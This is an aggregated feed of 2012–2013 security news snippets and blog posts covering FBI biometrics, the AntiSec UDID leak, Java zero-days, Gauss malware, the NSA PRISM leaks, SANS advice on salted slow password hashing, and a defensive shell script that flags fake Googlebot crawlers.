http://feeds.pcworld.com/pcworld/blogs/security_alert/ The FBI is getting ready to roll out a new nationwide program to better identify criminals called the Next Generation Identification (NGI) project. The new program is expected to add biometric data to Bureaus toolkit with iris scans, DNA analysis, voice identification, and even the ability to pick out a persons face in a crowded street using surveillance cameras. Credit: WikimediaThe FBI and Lockheed Martin Transportation and Security Solutions, who won the NGI contract, have received $1 billon to make its NGI project a reality. According to New Scientist, a handful of states have already created a criminal photo database as part of a NGI pilot program that will go nationwide by 2014. Theoretically, the NGI system would be able to use its mugshot database to pick out criminals in a crowd using a face-matching algorithm. The program would scan for faces in footage taken by security cameras or public images uploaded to the Internet. The algorithm would then return a number of hits for investigators to look into. Of course, this sort of surveillance raises some obvious privacy concerns. The FBI states that it has conducted a Privacy Impact Assessment for NGI and that the program falls in line with the Privacy Act. In other words, its totally legal and is not considered law enforcement overreach. To read this article in full or to leave a comment, please click here

==> Apple device IDs hacked: What you need to know

http://feeds.pcworld.com/pcworld/blogs/security_alert/ A hacker collective known as AntiSec has published over a million Apple device IDs that it claims were captured from the laptop of an FBI agent. If you own an iPhone or iPad, you might be wondering what this hack means to you, and you might also be curious about why the FBI had your Apple UDID in the first place. The information was acquired and released by the hackers as a political statement. The lengthy diatribe posted on Pastebin along with the hacked Apple ID info rants about government oppression and hypocrisy. Why does the FBI have 12 million Apple device UDIDs on a laptop? While the group has published one million and one hacked Apple device IDs, it should be given at least a little credit for restraint. The details stolen from the FBI laptop included more personal information as wellsuch as full names, cell phone numbers, addresses and zip codes. According to the letter from AntiSec, there were approximately 12 million Apple device IDs stored in the file on the FBI laptop. It chose to release just a portion rather than publishing all 12 million. AntiSec could have simply published the data it acquired without scrubbing it first, but the point its trying to make is against the government and the FBInot the individuals whose information happened to be in the hands of the FBI. To read this article in full or to leave a comment, please click here

==> Plan X: DARPA’s Cyberwar

http://feeds.pcworld.com/pcworld/blogs/security_alert/ DARPA, if you didnt know, stands for Defense Advanced Research Projects Agency. It's the government body that develops ridiculous things like flying tanks and other science fiction. Next month, however, DARPA is hitting closer to home with Plan X, a one-day workshop designed to flesh out the U.S. governments strategy for war in cyberspace. Plan X is a two-pronged affair that consists of a general-access session for your standard contractors and government employees, and a secret session to map out where the US is going in the future of cyber warfare. What will it deal with, specifically? The event wont get into research and development of cyberweapons or vulnerability analysis. Its geared towards defense: In the session, DARPA will focus on ways to create revolutionary technologies for understanding, planning, and managing cyberwarfare in realtime, large-scale and dynamic network environments, as well as how to research the nature and history of cyberwarfare. It's all to dominate the cyber battlespace, according to a publicly available PDF on the matter. To read this article in full or to leave a comment, please click here

==> Does Oracle Patch for Java 7 Fix the Zero-Day Flaw?

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Oracle issued a patch today for Java 7. Coincidentally, Java 7 has also been the target of recent attacks thanks to a zero-day exploit. For now, though, its anyones guess whether or not the new Java 7 patch actually addresses the zero-day exploits, or to what extent. First, a brief recap. A previously unknown flaw in Java was discovered, and a proof-of-concept (PoC) exploit was developed in the popular Metasploit Framework tool. Metasploit is a tool used by the good guys, but an exploit is an exploit, and the fact that the exploit PoC code was developed for Metasploit means that the exploit is now in the hands of many more would-be attackers. Oracle already knew about the 'zero-day' flaws, so hopefully this patch fixes them. According to the normal Oracle patch release schedule, the next routine update isnt supposed to occur until October. However, Java is a popular and widely used platform, and it would probably be catastrophic for Oracle to wait a month or more to produce a patch. Fast forward a few days, and voila! A patch. Maybe. There is definitely an update for Java 7 available from Oracle. However, its not yet clear what it fixes. To read this article in full or to leave a comment, please click here

==> Warning: Java Zero Day Flaw Under Attack

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Java is under attack again. A zero-day vulnerability in Java is being actively exploited in the wild. The current attacks seem to be targeted, but security experts warn that more widespread attacks could be imminent. Next to Adobe Reader and Adobe Flash, Java is probably one of the most ubiquitous and widely used applications. Unfortunately, it also provides attackers with plenty of holes and vulnerabilities to exploit, which makes it a popular target. Security experts warn users to expect more exploits of the Java zero-day. Proof-of-concept (PoC) code has been developed for the Metasploit Framework tool. Wolfgang Kandek, CTO of Qualys, explains that this is concerning because it makes the exploit available to a much wider audience, and probably means more attacks targeting the Java vulnerability are on the horizon. Andrew Storms, director of security operations for nCircle, is concerned that it could be a while before a patch or update is released to resolve the vulnerability and guard against these attacks. Oracle isnt known for releasing patches out of cycle and the next scheduled update for Java isn't until October. Part of the problem is that Java is so ubiquitous that it tends to be overlooked as a small piece of software. To read this article in full or to leave a comment, please click here

==> Has Android Malware Tripled in Recent Months? Not So Fast

http://feeds.pcworld.com/pcworld/blogs/security_alert/ There never seems to be any shortage of Android malware reports circulating in the news, and today one came out that sounds alarming indeed. android malwareAndroid Under Attack: Malware Levels for Googles OS Rise Threefold in Q2 2012 was the title of the press release from antivirus vendor Kaspersky announcing it, in fact, and right on cue headlines are popping up across the tech media echoing that dire warning. But is it really as bad as all that? Probably not. In fact, as pointed out by security-focused publication The H on Thursday, data from competing firm F-Secure paint a very different picture for the very same time period. In fact, rather than a tripling of Android malware in the second quarter, F-Secure found only a modest rise. How to explain the difference? It's all a matter of methodology, according to The H, which calls F-Secure's approach more sophisticated. To read this article in full or to leave a comment, please click here

==> Gauss Cyber Espionage Threat Targets Banking Info

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Gauss joins the ranks of Stuxnet, Duqu, and Flame as an apparently state-sponsored tool of cyber espionage. This latest threat appears to be built from the same code foundation as Flame, and specifically targets bank credentials and financial data. Kaspersky Lab--the largest privately held vendor of antimalware and endpoint security products--announced the new threat. A Kaspersky FAQ about Gauss boils the description of Gauss down to a 140-character tweet: Gauss is a nation state sponsored banking Trojan which carries a warhead of unknown designation. Gauss seems to come from the same code foundation as Flame. Gauss has been flying under the radar and evading detection since the fall of 2011. Ironically, it was discovered during operations initiated by the International Telecommunications Union (ITU) in the wake of Flame in an effort to detect and mitigate any other stealthy cyber threats. Mission accomplished. Kaspersky was able to detect and identify the threat--dubbed Gauss because its main module is named after the German mathematician Johann Carl Friedrich Gaussbecause it uses a similar architecture, module structure, code base, and methods of communication with command and control (C&C) servers as its cousin, Flame. To read this article in full or to leave a comment, please click here

==> Mat Honan Hack Pokes Holes in Apple iCloud

http://feeds.pcworld.com/pcworld/blogs/security_alert/ The hackers that hijacked Mat Honans online life, took over his Twitter account(s), and wiped out his iPhone, iPad, MacBook, and Google accounts in one fell swoop showed some perseverance in achieving that goal. Not all attackers are quite that determined, but the hack still demonstrates some serious flaws in Apples iCloud and the iCloud security model. My iPhone, iPad, and MacBook Air are all synced through Apples iCloud--just like Mat Honan. I appreciate the convenience and simplicity of the fact that I can add a contact on my iPad, and it will automatically sync to the other two devices. I can take a picture with my iPhone, and the photo will be available from the iPhone and MacBook as well. It just works. With one username and password I can pinpoint or remotely wipe all of my Apple devices. The Mat Honan hack is a poignant illustration of how it just works can be a double-edged sword. If it just works for you, it also just works for an attacker who manages to gain access to your iCloud account. The first potential problem with the automatic syncing is that someone with possession of my iPhone or iPad could wreak havoc. If someone starts deleting contacts, calendar events, or other synced information, those changes should be automatically synced across to the other devices which would mean losing the information on all of them because it just works. To read this article in full or to leave a comment, please click here

==> How Did Apple Allow Hackers to Access iCloud Account?

http://feeds.pcworld.com/pcworld/blogs/security_alert/ The Internet is abuzz this weekend as a result of the Gizmodo Twitter account getting hijacked. That incident was traced back to the hack of an Apple iCloud account--allegedly accomplished through social engineering. A Forbes.com story from Adrian Kingsley-Hughes explains that a former contributor for Gizmodo, Mat Honan, was the original victim of the attack. Hackers were able to access Honans iCloud account, and remotely wipe his iPhone, iPad, and MacBook. The original theory was that the hackers used a brute force attack to crack Honans iCloud password, but further investigation revealed that social engineering was used to convince Apple the attackers were Honan, and Apple gave them the keys to walk right in. It took me months to "social engineer" my way into my own Apple ID account. Color me incredulous! Why? Well, I have my own story of Apple woe--and its the exact opposite experience. I somehow lost access to my own email address for use on iTunes, iCloud, and other Apple services, and it took months of fighting with Apple Support to finally get to the bottom of things and get into my own account. I couldnt get Apple Support to give me access to my own account, never mind someone elses. To read this article in full or to leave a comment, please click here

==> Can Congress Protect the Nation's Critical Infrastructure?

http://feeds.pcworld.com/pcworld/blogs/security_alert/ The nations critical infrastructure is at risk--a well-executed cyber attack could have a potentially devastating effect. Congress is trying to patch some of the holes with legislation, but a recent survey found that most security experts have little faith that government regulation can do the trick. Sensational attacks against the critical infrastructure make for great stories in books like Zero Day: A Novel by respected security expert Mark Russinovich, or perhaps something from Dan Brown. But, many security experts believe that we are in very real danger of such attacks moving from fiction to reality, and that we are woefully unprepared to defend against, or respond to them. Most of our elected officials are simply not qualified to craft information security legislation. What is the critical infrastructure? Executive Order 13010, signed by President Clinton on July 15, 1996 established the Presidents Commission on Critical Infrastructure Protection. It explains, Certain national infrastructures are so vital that their incapacity or destruction would have a debilitating impact on the defense or economic security of the United States. Natural gas, electricity, drinking water, nuclear facilities, roads and highways, air traffic, railroads, and the Internet itself can all be classified as being part of our critical infrastructure. To read this article in full or to leave a comment, please click here

==> How to choose an office security system

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Protect Your Assets: A Buying Guide to Office Security SystemsWe talk frequently about cybersecurity, discussing how to protect your businesss data by using strong passwords, deploying antimalware utilities, and keeping your computers safe with the latest patches and updates. This time, the focus is on premises security, or protecting your businesss physical assets from burglary and vandalism. The best cybersecurity measures in the world are useless if a thief breaks into your office and makes off with your computers. You wont lose any digital data if youve followed our advice to back up your computers to secure, offsite locations; but if your business is like most operations, it isn't entirely digital. You have paper records, including sensitive personal information about your employees. Your business also depends on physical assetscomputers, displays, servers, fax machines, and everything that goes with themthat you will need to replace if someone steals them or destroys them. Can you afford that kind of disruption? To read this article in full or to leave a comment, please click here

==> Mac OS X Targeted By Clever New Trojan

http://feeds.pcworld.com/pcworld/blogs/security_alert/ A new Mac malware threat has been discovered. The OSX/Crisis Trojan is an insidious clever threat. Mac users should take steps to defend against this new malware, and proactively defend against future threats while theyre at it. OSX/Crisis is uniquely sneaky. First of all, the malware is cross-platform. It identifies the operating system, and executes different instructions depending on whether the target is a Windows or Mac OS X system. The malware is capable of infecting OS X 10.6 Snow Leopard and OS X 10.7 Lion systems without requiring a password, or any user intervention. Once it infiltrates the system, it exhibits different behavior depending on whether or not it has Admin level privileges on the target. OSX/Crisis is exceptional in its ability to adapt on the fly to attack a broader range of targets. Curtis Fechner, Webroot threat research analyst, explained, We've been looking at this and it's quite complex, as well as fascinating. I think the most important opinion we've formed is that we see more threats for the Mac platform like this one on the horizon. To read this article in full or to leave a comment, please click here

==> It's a Huge Mistake to Remove Password Prompt for Free Apps in iOS 6

http://feeds.pcworld.com/pcworld/blogs/security_alert/ According to sources with access to the developer beta of iOS 6, the next version of Apples mobile operating system will allow users to download and install free apps without requiring a password. If Apple doesnt fix that before iOS 6 is officially launched, it will significantly impair the security of iOS devices. iOS has established a reputation as the more secure mobile platform. The walled garden of the Apple App Store, and the scrutiny apps must go through before theyre available provide additional layers of defense lacking in other mobile operating systems. Apple is choosing convenience over security by removing the password requirement in iOS 6. In this case, though, Apple seems to be choosing functionality and expediency over security. Its a decision that could come back to haunt Apple, and all iOS users. Andrew Storms, director of security operations for nCircle, does not approve. The decision to remove password authentication from free app downloads is just another example of Apple making consumers responsible for their own security, and thats always risky at best. To read this article in full or to leave a comment, please click here

==> Emerging threats include kinetic attack, offensive forensics: RSA 2013

http://feeds.pheedo.com/tt/1323 At RSA 2013, experts Ed Skoudis and Johannes Ullrich explained how the SANS CyberCity supports offensive forensics and helps prevent kinetic attacks.

==> Bad outsourcing decisions cause 63% of data breaches

http://feeds.pheedo.com/tt/1323 Bad outsourcing decisions nearly two-thirds of data breaches investigated by security firm Trustwave in the past year

==> Cyber attacks on trust could cost top firms $398m, says Ponemon

http://feeds.pheedo.com/tt/1323 Every Global 2000 organisation faces $398m in potential losses from new and evolving attacks on their ability to control trust with cryptographic keys and digital certificates, a study has revealed

==> Audits and compliance requirements for cloud computing

http://feeds.pheedo.com/tt/1323 Even as India Inc experiments with the cloud, security concerns play spoilsport. These cloud computing audit and compliance tips will make your journey easier.

==> Cutwail botnet spam campaign tied to Zeus banking Trojan

http://feeds.pheedo.com/tt/1323 The cybercriminals connected to the notorious Zeus Trojan are using the Cutwail botnet to distribute spam designed to steal account credentials.

==> PCI validation: Requirements for merchants covered by PCI DSS

http://feeds.pheedo.com/tt/1323 Mike Chapple details the PCI validation requirements for merchants covered by PCI DSS.

==> VoIP security strategy helps WNS tackle cross-party risk

http://feeds.pheedo.com/tt/1323 Indian BPO major WNS ensures robust risk management and PCI-DSS compliance through simple VoIP security solution, despite outdated client infrastructure.

==> Analysis: Windows 8 security features improve on Windows 7 security

http://feeds.pheedo.com/tt/1323 Expert Michael Cobb says Windows 8's security features, like Windows Defender and Secure Boot, are a step forward for desktop and BYOD security.

==> Study finds spear phishing at heart of most targeted attacks

http://feeds.pheedo.com/tt/1323 Malicious file attachments are typically used as the payload, according to a report issued this week by Trend Micro.

==> Security business analyst – a role whose time has come

http://feeds.pheedo.com/tt/1323 For effective information security, India Inc requires security business analysts. These should be people who understand security, technology and the business.

==> Mitigate phishing attacks in the cloud: A how-to

http://feeds.pheedo.com/tt/1323 As Indian enterprises increasingly move to the cloud, so are phishing attempts. Here are some ways to mitigate the risks of phishing in the cloud.

==> Study finds most antivirus products ineffective

http://feeds.pheedo.com/tt/1323 Slow updates to signature databases cause some antivirus products to be ineffective against known threats, according to a study by security firm Imperva.

==> Zenmap tutorial: Mapping networks using Zenmap profiles

http://feeds.pheedo.com/tt/1323 Video: In this Zenmap tutorial screencast, Keith Barker of CBT Nuggets explains how to efficiently map networks graphically using Zenmap profiles.

==> Combat social engineering attacks with these mantras

http://feeds.pheedo.com/tt/1323 Of all the security threats, those involving the human angle are perhaps the deadliest. Keep social engineering at bay with these tips.

==> Phishing attack, stolen credentials sparked South Carolina breach

http://feeds.pheedo.com/tt/1323 A phishing attack and stolen credentials gave an attacker access to the systems of the South Carolina Department of Revenue for two months.

==> Cloud security begins with the contract, says expert

http://feeds.pheedo.com/tt/1323 Enterprises must empower their legal teams to ask the right questions and write contracts based on risk management, explains Tom Kellermann of Trend Micro.

==> Deception, proactive defenses can better protect IP, says expert

http://feeds.pheedo.com/tt/1323 Deceptive environments, phony data in the enterprise can fool attackers and increase the cost of hacking, says noted cybersecurity expert Paul Kurtz.

==> After antimalware: Moving toward endpoint antivirus alternatives

http://feeds.pheedo.com/tt/1323 Is it time to "cut the cord" with endpoint antimalware? Matthew Pascucci discusses possible antivirus alternatives.

==> PCI Council: Risk assessment methodology unique to company environment

http://feeds.pheedo.com/tt/1323 The PCI Risk Assessment Special Interest Group concludes that risk assessments are based on a company's unique risk tolerance and environment.

==> First Lawsuit Over NSA Phone Scandal Targets Obama, Verizon

http://feeds.wired.com/wired27b First Lawsuit Over NSA Phone Scandal Targets Obama, VerizonThe first of what likely will be many lawsuits challenging the constitutionality of the NSA's dragnet phone surveillance program was lodged Sunday, calling the newly disclosed operation an "outrageous breach of

==> Spy Court Urged to Unmask Legal Basis for NSA Dragnet Phone Surveillance

http://feeds.wired.com/wired27b Spy Court Urged to Unmask Legal Basis for NSA Dragnet Phone SurveillanceDoes the Patriot Act really give the secretive Foreign Intelligence Surveillance Act Court the authority to require telephone carriers supply a feed of all calling metadata? The court's legal rationale on

==> What’s in the Rest of the Top-Secret NSA PowerPoint Deck?

http://feeds.wired.com/wired27b What’s in the Rest of the Top-Secret NSA PowerPoint Deck?Whats in NSA whistleblower Edward Snowdens 41-slide PowerPoint deck thats so hot

==> NSA Whistleblower: The Ultimate Insider Attack

http://feeds.wired.com/wired27b NSA Whistleblower: The Ultimate Insider AttackEdward Showden might well be the ultimate inside attacker, since he had not only that rarest of rare views into the core of the intelligence rabbit hole but also the

==> NSA Contractor Outs Himself as Source of Surveillance Documents

http://feeds.wired.com/wired27b NSA Contractor Outs Himself as Source of Surveillance DocumentsEdward Snowden, a former technical employee for the CIA and current contractor for the NSA, has outed himself as the source of a string of explosive documents describing NSA surveillance activities against

==> Intel Director Sets Record Straight on PRISM, Sort Of

http://feeds.wired.com/wired27b Intel Director Sets Record Straight on PRISM, Sort OfFollowing a two-day storm of media headlines and company denials, the director of national intelligence has finally fully entered the fray to release a FAQ

==> Zuckerberg, Page: NSA Has No ‘Direct Access’ to Facebook or Google Servers

http://feeds.wired.com/wired27b Zuckerberg, Page: NSA Has No ‘Direct Access’ to Facebook or Google ServersFacebook chief Mark Zuckerberg and Google CEO Larry Page both denied today that they’ve given U.S spies access to their companies’ backend servers, deepening the core mystery around the NSA’s newly-disclosed PRISM

==> Obama Asked Intel Agencies to Draw Up List of Possible Cyber Targets Overseas

http://feeds.wired.com/wired27b Obama Asked Intel Agencies to Draw Up List of Possible Cyber Targets OverseasPresident Barack Obama ordered U.S. intelligence agencies to draw up a list of possible overseas targets for offensive cyberattacks, according to a

==> NSA Is Wired Into Top Internet Companies’ Servers, Including Google and Facebook

http://feeds.wired.com/wired27b NSA Is Wired Into Top Internet Companies’ Servers, Including Google and FacebookThe NSA and FBI directly tapped central servers belonging to nine U.S. internet firms, in order to get a constant feed of audio, video, photos, emails and documents as well as connection logs, according to

==> Also Revealed by Verizon Leak: How the NSA and FBI Lie With Numbers

http://feeds.wired.com/wired27b Also Revealed by Verizon Leak: How the NSA and FBI Lie With NumbersWhile the feds are required to disclose the number of orders they apply for and receive, they arent required to say how many people are targeted in each order. So a single order issued to Verizon Business Solutions

==> I Totally Owned Your Grandma…

http://hellnbak.wordpress.com/feed/ This was originally written by me and posted here as a guest blog: http://www.zdnet.com/blog/feeds/i-totally-owned-your-grandma-aka-social-networks-as-attack-platforms/2838 ========================================= Guest editorial by Steve Manzuik Lately there has been a lot of attention given to various privacy issues of social networking sites. Whether it is Googles Buzz automatically adding anyone you have ever emailed to your follow list or the [...]

==> Now for Something Completely Different

http://hellnbak.wordpress.com/feed/ Apologies to those who follow this blog just for my security geek content. But this time I am posting something completely different. For the three years I have lived in the bay area I have been partially a San Jose Sharks hockey fan as well as a Calgary Flames fan. I have taken all kinds [...]

==> Backpeddled But Still Very Wrong

http://hellnbak.wordpress.com/feed/ I guess all of the attention that the mindless blog post by eEyecreated has caused them to backpeddlequite a bit. Sadly Morey is still way off the mark and if anything just made it more clear that he is attempting to use this as a reason you should buy their product and not use the [...]

==> How The Mighty Have Fallen

http://hellnbak.wordpress.com/feed/ Full Disclosure: I am a former eEye employee and managed their now pretty much dead Research Department. Something of which, after reading this post, I can honestly say I am embarrassed to admit. This is a classic case of the insane taking over the asylum. This morning a friend of mine pointed out this blog [...]

==> Apparently Time Has Reversed – Not The Disclosure Debate Again?!?

http://hellnbak.wordpress.com/feed/ Remember back in 2001 when researchers were compared to Terrorists and the term “Information Anarchy” was coined? You can read this blast from the past here –> http://www.windowsitpro.com/article/windows-client/information-anarchy-the-blame-game-.aspx As the saying goes, those who do not learn from history are doomed to repeat it, or something like that we have this clueless blog post over [...]

==> Murder – Just Like In The Video Games

http://hellnbak.wordpress.com/feed/ By now I am sure most of you have seen the “Collateral Murder” video that was released via Wikileaks. I do not want to get involved with the arm chair debates over what should or should not have happened. I have no real military experience to speak of unless being chased off a Canadian base [...]

==> Creepy GMail “Feature”

http://hellnbak.wordpress.com/feed/ I stumbled upon this creepy GMail “feature” the other day. Basically, it appears that there is some logic that notices when you type the phrase “see the attached” and then checks for a file attachment alerting you if you fail to attach a file. With all the privacy concerns around GMail I found this to [...]

==> Nexus-1 Honeymoon is Over

http://hellnbak.wordpress.com/feed/ As many of my friends know. I am very hard on my electronics. My laptops, my MP3 players, my cell phones and even the TV remote all get abused in various ways. So, in typical bleep fashion, over the weekend I dropped my Nexus-1 phone and sadly, even thoughit wasn’t a far fall -a couple [...]

==> Clueless FUD Article…

http://hellnbak.wordpress.com/feed/ I haven’t blogged anything of good use lately so I thought I would start upagain by calling out this completelyuseless and incorrect opinion piece. On the Dark Reading blog an article appeared entitled; “Share –Or Keep Getting Pwned” Sigh. Clearly zero research was done in to this posting as there really is a lot of [...]

==> Week 23 in Review – 2013

http://infosecevents.net/feed/ Resources The Ultimate Guide to Finding and Using Free Images On Your WordPress Site – wpmu.org Blog writing can involve a lot of blood, sweat and tears, unless youre one of those magical people who can tap out an insightful post with inexplicable ease or some kind of deus ex machina intervention. Calling NTDLL Functions [...]

==> Week 22 in Review – 2013

http://infosecevents.net/feed/ Event Related CONFidence 2013 and the x86 quirks – gynvael.coldwind.pl Another week, another conference. Just a few days ago, Gynvael and I had the pleasure to attend and present at the CONFidence 2013 infosec conference traditionally held in Cracow, Poland. [Announcement] Blackhat Arsenal USA 2013 Selected Tools – toolswatch.org I’m pleased to announce the selected [...]

==> Information Security Events For June

http://infosecevents.net/feed/ Here are information security events in North America this month: Techno Security Conference : June 2 to 5 in SC, USA SummerCon : June 3 to 8 in New York USA CISO Executive Summit Ohio : June 5 in Cincinnati, OH USA BSides Detroit : June 7 to 8 in Detroit, [...]

==> Week 21 in Review – 2013

http://infosecevents.net/feed/ Event Related SOURCE Dublin SOURCE Dublin Wrap-Up Day #1 – blog.rootshell.be I flew on Wednesday evening to Dublin, Ireland to attend the SOURCE conference (previously, it was organised in Barcelona). The conference was held in the Trinity College, in the centre of the city. SOURCE Dublin Wrap-Up Day #2 – blog.rootshell.be This second day started [...]

==> Week 20 in Review – 2013

http://infosecevents.net/feed/ Event Related NoSuchCon #1 Wrap-Up – blog.rootshell.be So, lets welcome the newly born conference called NoSuchCon. The first edition was just organized in Paris across the last three days. Resources Download: Mobile Threat Report Q1 2013 – f-secure.com All of our past reports are also available in the “Labs” section of f-secure.com. Big Iron Back [...]

==> Week 19 in Review – 2013

http://infosecevents.net/feed/ Event Related SyScan 2013 SyScan13: Revisiting Mac OS X Rootkits presentation – reverse.put.as SyScan 2013, 10th anniversary edition is over! It is a great conference and I hope it does not end here. I had lots of fun and met new interesting people. Thomas is an awesome host! It helps that I really like Singapore [...]

==> Week 18 in Review – 2013

http://infosecevents.net/feed/ Event Related Syscan 2013 SyScan 2013, Bochspwn paper and slides – gynvael.coldwind.pl In our SyScan presentation, we explained the concept of kernel race conditions in interacting with user-mode memory, gave a brief rundown on how they can be identified by using CPU-level instrumentation of an operating system session, and later focused on how they can [...]

==> Information Security Events For May

http://infosecevents.net/feed/ Here are information security events in North America this month: Bsides San Antonio : May 4 in San Antonio, TX USA Secure360 : May 13 to 15 in Minnesota USA GovSec : May 13 to 15 in Washington DC USA HackMiami 2013 : May 17 to 19 [...]

==> Week 17 in Review – 2013

http://infosecevents.net/feed/ Event Related Notacon 10 (2013) Videos – irongeek.com These are the videos from the 10th Notacon conference held April 18th-21st, 2013. Not all of them are security related, but I hope my viewers will enjoy them anyway. Thanks to Froggy and Tyger for having me up, and to the video team: SatNights, Widget, Securi-D, Purge, [...]

==> Week 16 in Review – 2013

http://infosecevents.net/feed/ Event Related Great Scott Gadgets Infiltrate 2013 – greatscottgadgets.com Michael Ossmann and Kyle Osborn presented Two-Timing Data Connectors at Infiltrate 2013. Resources Nessus Using Posh-SecMod PowerShell Module to Automate Nessus(Part1) – darkoperator.com One showed me some of the scripts they use and then it came to me why not automate Nessus from with in PowerShell. [...]

==> The blog has moved…

http://infosecramblings.wordpress.com/feed/ After much thought and consideration, I decided to move my blog from wordpress.com to my own domain. The decision has nothing to do with the service provided by wordpress.com. I have never had any problems with this blog while it has been hosted by wordpress.com. There are other things I want to do with the […]

==> Interesting Information Security Bits for 11/07/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. Virtualization: How to Isolate Application Traffic Lori has penned a nice article pointing out how we can use VLANs to isolate application traffic. She makes and excellent point in the article, “we’ve grown to […]

==> Interesting Information Security Bits for 11/06/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. TaoSecurity: Defining Security Event Correlation Richard has a good post up on defining security event correlation. Go check it out. Why use Firefox << Techdulla Techdulla tells us why he uses Firefox for his […]

==> Interesting Information Security Bits for 11/05/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. CSI Stick – So who has a copy of your phone? << SANS Computer Forensics, Investigation, and Response This is both very cool and very scary. Tool that allows you to quickly and easily […]

==> Interesting Information Security Bits for 11/04/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. /dev/random >> Blog Archive >> Critical dns2tcp Vulnerability! Looks like dns2tcp has a vulnerability that needs to be taken care of. Time to upgrade. TrueCrypt – Free Open-Source On-The-Fly Disk Encryption Software for Windows […]

==> Resources to increase your info security knowledge and benefit your infosec career…

http://infosecramblings.wordpress.com/feed/ @GeekGrrl posted a note on her blog asking this question: 1) How would you recommend getting started on a career toward Network Security/Network Pen Tester? She has some follow-up questions to that first one requesting some specific information. Go read her post and then come back. . . . . Okay, here is what I […]

==> Who needs employee exit procedures and disaster recovery plans are for whimps…

http://infosecramblings.wordpress.com/feed/ This article talks about the conviction of Pryavrat Patel for actions he took after his long-term contract employment with Pratt-Read was terminated. Now, what Mr. Patel did was definitely wrong, but frankly, Pratt-Read should probably put some thought into how they dealt with the situation too. It took them two weeks to recover from the […]

==> Recap: RSA Europe 2008 Day 2

http://infosecramblings.wordpress.com/feed/ Hello again. Day 2 of RSA Europe 2008 was a busy one. I attended several sessions during the day and then the Security Catalyst, Security Bloggers, Security Twits get together happened that evening. This post will only talk about the day. The meet-up post will be later. Without further ado, let’s get to it. ‘The […]

==> Recap: RSA Europe 2008 Day 1

http://infosecramblings.wordpress.com/feed/ Hi there folks. I am home and somewhat rested from my trip to London for the RSA Europe 2008 conference. It was a great trip and i enjoyed the conference. Below is a recap of my first day. This is going to be long, so hang in there Information Security: From Ineffective to Innovative Arthur […]

==> Store passwords the right way in your application, (Tue, Jun 11th)

http://isc.sans.org/rssfeed_full.xml I suspect most of our readers know this, but it can't hurt to repeat this every so often as there is a lot of confusion on the issue. One thing that gets to me is seeing reports of website compromises that claim "the passwords were hashed with SHA-256". Well at face value that means 90% of the passwords were decoded before the news hit. If you have an application that's protected by passwords, there are a few rules to follow: Rule #1: Never store plain passwords, use a hash The worst case solution is that passwords are stored as is. Any attacker breaking in to the application now has evething they need to impersonate any user in your application. But typically they have much more: your users typically reuse passwords, so there's no telling to how far this goes. And if the application is e.g. a webmail solution: well all accounts that can be reset by sending an email here are now essentially broken as well. A hash function is a one-way funtion: it converts input to output but there is no easy way to reverse the process. There's a whole bunch of algorithms commonly used. The goal/advantage here is that even if the attacker takes away the user tables, he's still got some work to do. Unfortunately the work is doable so we need more ... Rule #2: Use a salt Attackers can precompute (or buy) so called rainbow tables: it's a list of precomputed password -> hash values and as such decoding any common password is as fast as a lookup to them gets. A salt is essentially a random string chosen at the time of password change or creation and stored along with the hash and concatenated to the password. This makes rainbow tables useless. But it's still not enough... Rule #3: Use a slow hash function This rule is most often forgotten, yet it is so critical. The most common hash functions we use daily (e.g. SHA-256) are designed to be fast. But for storing passwords that's going to work against us big time. Even the attacker can't break SHA-512 in a brute force fashion, even if they can't use rainbow tables due to salts being used, they still will find the vast majority of the passwords our users can remember in a manner of minutes to hours if you use a fast hash. So you need to use a slow hash function. Since there's a Rule #0 in all things crypto: Don't invent your own: Just use the appropriate functions already there. Many of these slow hash functions allow one to chose the cost. If so, set it as high as you can bear with your current hardware. Examples In PHP one can use the crypt function using blowfish or many thousands of rounds of SHA-256 or SHA-512 instead of a simple hash function. Or even better if the cryptographich password hashing extension is installed, use it as it has simple support for e.g. rehashing passwords to update the strength of a hash of a stored password upon login of the user. Feel free to add comments on how to do it in other languages. -- Swa Frantzen -- Section 66 (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> ISC StormCast for Tuesday, June 11th 2013 http://isc.sans.edu/podcastdetail.html?id=3359, (Tue, Jun 11th)

http://isc.sans.org/rssfeed_full.xml (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> When Google isn't Google, (Mon, Jun 10th)

http://isc.sans.org/rssfeed_full.xml Like many other exploit scripts, the recent "Plesk" exploit used a fake user agent of "Googlebot". Attackers assume that most web applications are happy to be indexed by Google and possibly ably no or less stringent filters. For example, some applications will show more content to Google that is not readily displayed to normal users unless these users sign up, solve a captcha or even pay. Google however makes it pretty easy to distinguish "real" Google bots from fake once. The IP address used by Google will reverse resolve to crawl-a-b-c-d.googlebot.com, where a-b-c-d is the IP address of the bot. In addition, this host name will resolve to the IP address used. In order to validate if a google bot is "real", the lookup against .googlebot.com is required. An attacker could fake the reverse lookup if the attacker can provide reverse DNS for the IP address used by the attacker. Personally, I use a little shell script to extract "fake google" spiders from my logs: #!/bin/sh # you may need to adjut the "cut" parameter and file name to match your own log format.for b in `grep 'Googlebot' /var/log/httpd/*access_log | cut -f 2 -d' ' | sort -u`; do h=`host $b` if echo $h | grep -e ' crawl-.*\.googlebot\.com\.$'; then h=`echo $h | cut -f5 -d' '` n=`host $h | cut -f4 -d' '` if [ "$n" = "$b" ] ; then echo ok $n $h $b else echo fake $b; fi else echo fake $b; fidone -- Johannes B. Ullrich, Ph.D. SANS Technology Institute Twitter (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

==> ISC StormCast for Monday, June 10th 2013 http://isc.sans.edu/podcastdetail.html?id=3356, (Mon, Jun 10th)

http://isc.sans.org/rssfeed_full.xml (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

